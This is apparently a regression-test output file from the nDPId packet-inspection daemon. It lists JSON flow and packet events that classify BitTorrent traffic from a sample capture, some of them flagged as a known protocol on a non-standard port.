+00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1455469980262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980262,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4esFAAEAGAADAqAEDXUH5ZM6+emiQl\/fDL3XicoAYTYMYvAAAAQEIChncIlIAH\/RSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkTA1ljAvA+q8j0="} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980275,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4g5FAAEAGAADAqAEDXUHjZM69Sqzdpe7S802+OYAYVXMCvAAAAQEIChncIl4AhA2FE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkhEgSgYOOKqPw="} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1455469980297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469980297,"pkt":"xCwDBkn+LFbcjDU0CABFYACEPABAADIGPZ9T2LjxwKgBA8jVzr8EzpQUM6tZV4AYECksHwAAAQEICngbZ84Z3CIjE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qnlHDgsE5LNSCYRoAAAEAFABkMTplaTA="} +01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1455469980371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469980371,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ8C7pAADIGa+1T2LjxwKgBA8jVzr8EzpRkM6tZV4AYECkszQAAAQEICngbaAwZ3CJzZTQ6aXB2NDQ6U9i48TQ6aXB2NjE2Ov6AAAAAAAAA6gaI\/\/7N9BMxMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUxNDEzZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDEuOC44Mjp5cGk1MjkyN2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/v\/\/\/\/\/\/\/\/9\/f\/+\/\/9\/\/\/f\/\/\/\/\/\/\/73v\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/7\/\/3\/9v\/\/\/9+\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/+\/\/\/\/7\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAiQAAAAFBAAAAQwAAAAFBAAAAisAAAAFBAAAArIAAAAFBAAAAFgAAAAFBAAAAxMAAAAFBAAAAgYAAAAFBAAAAfgAAAAFBAAAAvcAAAAFBAAAAm0AAAAFBAAAAMYAAAAFBAAAA0sAAAAFBAAAAXAAAAAFBAAAAMEAAAAFBAAAAecAAAAFBAAAABcAAAAFBAAAAI4AAAAFBAAAAHoAAAAFBAAAAgkAAAAFBAAAAMsAAAAFBAAAAGkAAAAFBAAAARw
AAAAFBAAAAdQAAAAFBAAAAFA="} +00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1455469980390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1455469980390,"pkt":"xCwDBkn+LFbcjDU0CABFAACocqBAAHMGfF5dQflkwKgBA3pozr4vdeJykJf4B4AYAMOuCwAAAQEICgAf9F4Z3CJSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogL0Pl3FbMgdQMAAAAEAFABkMTplaTBlNDppcHY0NDpdQflkNDppcHY2MTY6IAEAAF71ef0Mhifaor4="} +01334{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1455469980488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1455469980488,"pkt":"xCwDBkn+LFbcjDU0CABFAAJYcqJAAHMGeqxdQflkwKgBA3pozr4vdeLmkJf4B4AZAMO1LAAAAQEICgAf9F8Z3CJSBpsxMjpjb21wbGV0ZV9hZ29pMmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTMxMzM2ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyNmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/99\/\/\/\/\/\/9\/\/+\/\/\/\/\/\/\/\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/v\/\/\/\/\/9\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/36\/\/\/\/\/93\/\/\/\/\/\/\/\/\/\/\/\/\/fv\/\/\/9P\/\/3\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAm0AAAAFBAAAApQAAAAFBAAAAI0AAAAFBAAAA0AAAAAFBAAAASAAAAAFBAAAAwgAAAAFBAAAAHoAAAAFBAAAAV0AAAAFBAAAAfQAAAAFBAAAAwsAAAAFBAAAAmsAAAAFBAAAAhwAAAAFBAAAAuYAAAAFBAAAAmQAAAAFBAAAApAAAAAFBAAAAFAAAAAFBAAAAc0AAAAFBAAAAa0AAAAFBAAAAx4AAAAFBAAAANIAAAAFBAAAAu0AAAAFBAAAAwoAAAAFBAAAAEoAAAAFBAAAAME=
"} +00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00839{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7560000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7560000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7560000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00849{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 